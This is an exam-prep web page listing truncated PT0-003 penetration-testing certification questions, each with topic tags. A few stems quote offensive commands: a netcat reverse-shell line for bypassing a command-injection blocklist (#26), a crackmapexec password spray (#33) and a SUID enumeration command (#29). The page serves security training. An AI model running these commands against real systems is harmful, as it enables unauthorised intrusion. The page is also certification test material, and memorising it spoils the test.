PT0-003 Exam Questions
302 real PT0-003 exam questions with expert-verified answers and explanations. Page 1 of 7.
- Question #1: Network Security
A penetration tester downloads a JAR file that is used in an organization's production environment. The tester evaluates the contents of the JAR file to identify potentially vulner...
Penetration testing, Software Composition Analysis (SCA), Vulnerability assessment
- Question #2: Network Security
During a penetration testing engagement, a tester targets the internet-facing services used by the client. Which of the following describes the type of assessment that should be co...
Penetration testing, External assessment, Scope of work
- Question #3: Network Security
A penetration tester has just started a new engagement. The tester is using a framework that breaks the life cycle into 14 components. Which of the following frameworks is the test...
Penetration testing frameworks, OSSTMM, Cybersecurity standards
- Question #4: Network Security
A penetration tester is evaluating a SCADA system. The tester receives local access to a workstation that is running a single application. While navigating through the application,...
Penetration testing, SCADA security, Kiosk escape, Privilege escalation
- Question #5: Network Security
A penetration tester presents the following findings to stakeholders: Control | Number of findings | Risk | Notes Encryption | 1 | Low | Weak algorithm noted Patching | 8 | Medium...
Penetration testing, Vulnerability management, Secure SDLC, SCA tool
- Question #6: Network Security
While conducting a reconnaissance activity, a penetration tester extracts the following information: Emails: - [email protected] - [email protected] - [email protected] Which of the follo...
Penetration testing, Reconnaissance, Social engineering, Attack vectors
- Question #7: Network Security
A penetration tester gains access to a host but does not have access to any type of shell. Which of the following is the best way for the tester to further enumerate the host and t...
Penetration testing, Post-exploitation, Enumeration tools, Netcat
- Question #9: Network Security
A penetration tester cannot find information on the target company's systems using common OSINT methods. The tester's attempts to do reconnaissance against internet-facing resource...
Penetration testing, Reconnaissance, WAF evasion, Code repository scanning
- Question #10: Network Security
During a penetration test, the tester uses a vulnerability scanner to collect information about any possible vulnerabilities that could be used to compromise the network. The teste...
Penetration testing, Vulnerability validation, SNMP enumeration, False positives
- Question #11: Network Security
A penetration tester is working on a security assessment of a mobile application that was developed in-house for local use by a hospital. The hospital and its customers are very co...
Penetration testing, Mobile application security, Security assessment methodology
- Question #12: Network Security
Before starting an assessment, a penetration tester needs to scan a Class B IPv4 network for open ports in a short amount of time. Which of the following is the best tool for this...
Penetration testing tools, Port scanning, Network reconnaissance, masscan
- Question #13: Attacks and Exploits
A penetration tester is performing an authorized physical assessment. During the test, the tester observes an access control vestibule and on-site security guards near the entry do...
physical penetration testing, social engineering, tailgating, access control bypass
- Question #14: Attacks and Exploits
During a web application assessment, a penetration tester identifies an input field that allows JavaScript injection. The tester inserts a line of JavaScript that results in a prom...
web application security, JavaScript injection, XSS, client-side attacks
- Question #15: Post-exploitation and Lateral Movement
A penetration tester is working on an engagement in which a main objective is to collect confidential information that could be used to exfiltrate data and perform a ransomware att...
post-exploitation, data exfiltration, credential dumping, internal reconnaissance
- Question #16: Vulnerability Discovery and Analysis
During a penetration test, the tester identifies several unused services that are listening on all targeted internal laptops: Which of the following technical controls should the t...
system hardening, vulnerability management, service enumeration, risk reduction
- Question #17: Reconnaissance and enumeration
A penetration tester writes the following script to enumerate a /24 network: The tester executes the script, but it fails with the following error: -bash: syntax error near unexpec...
shell scripting, bash scripting, network enumeration, script debugging
- Question #18: Attacks and Exploits
A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester u...
payload execution, initial access, Windows commands, persistence
- Question #19: Vulnerability Discovery and Analysis
During a vulnerability assessment, a penetration tester configures the scanner sensor and performs the initial vulnerability scanning under the client's internal network. The teste...
vulnerability scanning, discovery scan, scope management, scan methodology
- Question #20: Vulnerability Discovery and Analysis
Which of the following describes the process of determining why a vulnerability scanner is not providing results?
vulnerability scanning, troubleshooting, root cause analysis, scan errors
- Question #21: Reconnaissance and enumeration
During a security audit, a penetration tester wants to run a process to gather information about a target network's domain structure and associated IP addresses. Which of the follo...
domain enumeration, DNS enumeration, reconnaissance tools, Dnsenum
- Question #22: Reconnaissance and enumeration
During an external penetration test, a tester receives the following output from a tool: test.comptia.org info.comptia.org vpn.comptia.org exam.comptia.org Which of the following c...
subdomain enumeration, OSINT, reconnaissance tools, amass
- Question #23: Engagement management
A penetration tester is developing the rules of engagement for a potential client. Which of the following would most likely be a function of the rules of engagement?
rules of engagement, engagement planning, testing window, legal agreements
- Question #24: Post-exploitation and Lateral Movement
During an assessment, a penetration tester manages to get RDP access via a low-privilege user. The tester attempts to escalate privileges by running the following commands: Import-...
privilege escalation, PrintNightmare, Windows post-exploitation, user sessions
- Question #25: Attacks and Exploits
A tester is performing an external phishing assessment on the top executives at a company. Two-factor authentication is enabled on the executives' accounts that are in the scope o...
phishing, 2FA bypass, typosquatting, Evilginx, social engineering
- Question #26: Attacks and Exploits
A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command: nc -e /bin/sh 10.10....
command injection, web application exploits, bypass techniques, shell scripting
- Question #27: Vulnerability Discovery and Analysis
A penetration tester needs to identify all vulnerable input fields on a customer website. Which of the following tools would be best suited to complete this request?
web application security, DAST, vulnerability scanning, input validation
- Question #28: Attacks and Exploits
A penetration tester enumerates a legacy Windows host on the same subnet. The tester needs to select exploit methods that will have the least impact on the host's operating stabili...
legacy Windows, exploit methods, responder, credential harvesting, low impact attacks
- Question #29: Post-exploitation and Lateral Movement
A penetration tester executes multiple enumeration commands to find a path to escalate privileges. Given the following command: find / -user root -perm -4000 -exec ls -ldb {} \; 2>...
privilege escalation, Linux permissions, SUID binaries, enumeration commands
- Question #30: Vulnerability Discovery and Analysis
A penetration tester creates a list of target domains that require further enumeration. The tester writes the following script to perform vulnerability scanning across the domains:...
shell scripting, bash scripting, vulnerability scanning, script debugging, Nikto
- Question #31: Post-exploitation and Lateral Movement
Given the following script: Which of the following is the penetration tester most likely trying to do?
command and control, remote execution, payload staging, post-exploitation
- Question #32: Reconnaissance and enumeration
A penetration tester completed OSINT work and needs to identify common subdomains for mydomain.com. Which of the following is the best command for the tester to use?
subdomain enumeration, OSINT, reconnaissance tools, DNS lookup
- Question #33: Attacks and Exploits
While performing an internal assessment, a tester uses the following command: crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@ Which of the following is the main purpose o...
password spraying, crackmapexec, SMB attacks
- Question #34: Reconnaissance and Enumeration
A penetration tester finishes an initial discovery scan for hosts on a /24 customer subnet. The customer states that the production network is composed of Windows servers but no co...
honeypots, reconnaissance anomalies, scan interpretation
- Question #35: Post-exploitation and Lateral Movement
A penetration tester gains access to a Windows machine and wants to further enumerate users with native operating system credentials. Which of the following should the tester use?
Windows enumeration, net.exe, user enumeration
- Question #37: Attacks and Exploits
A penetration tester is authorized to perform a DoS attack against a host on a network. Given the following input: Which of the following attack types is most likely being used in...
DoS attack, SYN flood
- Question #38: Engagement Management
Which of the following components should a penetration tester include in an assessment report?
penetration test report, attack narrative, reporting
- Question #39: Engagement Management
Which of the following tasks would ensure the key outputs from a penetration test are not lost as part of the cleanup and restoration activities?
artifact preservation, evidence collection, engagement closure
- Question #40: Vulnerability Discovery and Analysis
In a cloud environment, a security team discovers that an attacker accessed confidential information that was used to configure virtual machines during their initialization. Throug...
cloud security, metadata services, information disclosure
- Question #41: Attacks and Exploits
During an engagement, a penetration tester needs to break the key for the Wi-Fi network that uses WPA2 encryption. Which of the following attacks would accomplish this objective?
WPA2, KRACK attack, Wi-Fi security
- Question #42: Engagement Management
During a web application assessment, a penetration tester identifies an administrative tool that would allow for the production database to be deleted without authorization. Which...
rules of engagement, scope management, destructive testing
- Question #43: Post-exploitation and Lateral Movement
The following file was obtained during reconnaissance: Which of the following is most likely to be successful if a penetration tester achieves non-privileged user access?
information disclosure, Linux enumeration, sensitive data
- Question #44: Vulnerability Discovery and Analysis
A penetration tester is testing a power plant's network and needs to avoid disruption to the grid. Which of the following methods is most appropriate to identify vulnerabilities in...
ICS/SCADA security, passive reconnaissance, port mirroring
- Question #45: Vulnerability Discovery and Analysis
A penetration tester finished a security scan and uncovered numerous vulnerabilities on several hosts. Based on the targets' EPSS and CVSS scores, which of the following targets is...
vulnerability prioritization, CVSS, EPSS
- Question #46: Engagement Management
A penetration tester discovers evidence of an advanced persistent threat on the network that is being tested. Which of the following should the tester do next?
APT, incident response, reporting findings
- Question #47: Vulnerability Discovery and Analysis
A penetration tester needs to evaluate the order in which the next systems will be selected for testing. Given the following output: Hostname | IP address | CVSS 2.0 | EPSS hrdatab...
vulnerability prioritization, EPSS, CVSS
- Question #48: Reconnaissance and Enumeration
During an engagement, a penetration tester wants to enumerate users from Linux systems by using finger and rwho commands. However, the tester realizes these commands alone will not...
Linux enumeration, SMB enumeration, smbclient
- Question #49: Attacks and Exploits
A penetration tester wants to check the security awareness of specific workers in the company with targeted attacks. Which of the following attacks should the penetration tester pe...
social engineering, spear phishing, security awareness
- Question #50: Attacks and Exploits
A penetration tester wants to create a malicious QR code to assist with a physical security assessment. Which of the following tools has the built-in functionality most likely need...
client-side attacks, BeEF, physical security assessment
- Question #51: Vulnerability Discovery and Analysis
A penetration tester needs to help create a threat model of a custom application. Which of the following is the most likely framework the tester will use?
threat modeling, DREAD, risk assessment
- Question #52: Post-exploitation and Lateral Movement
During a penetration test, a tester attempts to pivot from one Windows 10 system to another Windows system. The penetration tester thinks a local firewall is blocking connections....
Windows firewall, netsh, lateral movement, post-exploitation